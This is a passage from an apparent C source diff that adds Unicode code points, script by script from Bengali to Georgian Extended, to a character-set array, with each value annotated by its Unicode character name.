+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
